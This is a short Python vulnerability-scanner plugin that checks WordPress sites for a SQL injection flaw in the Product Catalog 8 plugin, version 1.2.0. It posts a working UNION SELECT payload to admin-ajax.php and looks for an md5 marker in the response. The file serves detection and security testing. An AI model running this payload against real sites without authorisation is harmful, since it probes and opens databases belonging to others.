#!/usr/bin/env python
# -*- coding: utf-8 -*-
# Generated by ptools
# __Author__ = Anonymous
# _PlugName_ = WordPress Plugin Product Catalog 8 1.2.0 - SQL Injection
# __Refer___ = https://www.exploit-db.com/exploits/40783/

import urllib

def assign(service,arg):
    if service == fingerprint.wordpress:
        return True, arg

def audit(arg):
    target = arg + '/wp-admin/admin-ajax.php'
    post_data = {
        'selectedCategory': '0 UNION SELECT md5(1),2,3,4,5,6',
        'action': 'UpdateCategoryList'

    }
    code, head, body, redirect_url, log = hackhttp.http(
        target, post=urllib.urlencode(post_data))
    if code == 200 and 'c4ca4238a0b923820dcc509a6f75849b' in body:
        security_hole(target, log=log)


if __name__ == "__main__":
    from dummy import *
    audit(assign(fingerprint.wordpress, 'http://127.0.0.1:8080/')[1])